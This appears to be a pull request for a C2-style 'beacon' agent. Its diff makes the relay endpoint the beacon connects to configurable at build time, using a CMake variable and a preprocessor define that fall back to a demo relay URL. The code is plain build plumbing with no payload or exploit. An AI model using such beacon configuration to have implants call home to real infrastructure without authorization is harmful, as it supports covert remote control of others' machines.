### PR TITLE
feat(pia): build-time RELAY_URL injection (bake the beacon endpoint)

### DIFF
--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -42,9 +42,11 @@ include(${CMAKE_SOURCE_DIR}/cmake/Common.cmake)
 # =============================================================================
 set(BUILD_NUMBER "0" CACHE STRING "Agent build number")
 set(COMMIT_HASH "00000000" CACHE STRING "Agent commit hash")
+set(RELAY_URL "https://relay.nostdlib.workers.dev/agent" CACHE STRING "Relay /agent endpoint the beacon connects to (baked at build; override with -DRELAY_URL=...)")
 list(APPEND PIR_DEFINES
     AGENT_BUILD_NUMBER=${BUILD_NUMBER}
     AGENT_COMMIT_HASH="${COMMIT_HASH}"
+    AGENT_RELAY_URL="${RELAY_URL}"
 )
 
 include(${PIR_ROOT_DIR}/cmake/Target.cmake)

--- a/src/beacon/main.cc
+++ b/src/beacon/main.cc
@@ -30,9 +30,13 @@ static const CHAR *CommandTypeName(UINT8 type)
     }
 }
 
+#ifndef AGENT_RELAY_URL
+#define AGENT_RELAY_URL "https://relay.nostdlib.workers.dev/agent"
+#endif
+
 INT32 start()
 {
-    const CHAR url[] = "https://relay.nostdlib.workers.dev/agent";
+    const CHAR url[] = AGENT_RELAY_URL;
 
     Context context;
     UINT32 connectionAttempt = 0;


### PR DESCRIPTION
## Build-time RELAY_URL injection

The beacon endpoint (`main.cc`) was **hardcoded** to the demo relay (`relay.nostdlib.workers.dev/agent`), so every agent built from `main` beaconed the demo relay regardless of the operator's deploy. This ports the build-time `RELAY_URL` injection so the beacon endpoint is configured at build time.

### Changes
- `CMakeLists.txt`: new `RELAY_URL` cache var (default = demo relay) → added to `PIR_DEFINES` as `AGENT_RELAY_URL`.
- `src/beacon/main.cc`: `#ifndef AGENT_RELAY_URL` guard (default fallback) + `const CHAR url[] = AGENT_RELAY_URL;`.

### Usage
Builds that don't pass `-DRELAY_URL` get the demo-relay default (unchanged behavior). The parent `deploy.sh` / CI passes `-DRELAY_URL=<your-relay>/agent` so agents beacon the operator's deployed relay.

### Scope
Build plumbing only — **no Epic1** (no deploy token, no operator keypair). Agents still enroll on `main`'s public `/agent` endpoint. Mirrors the proven mainv2 pattern (string-literal define).
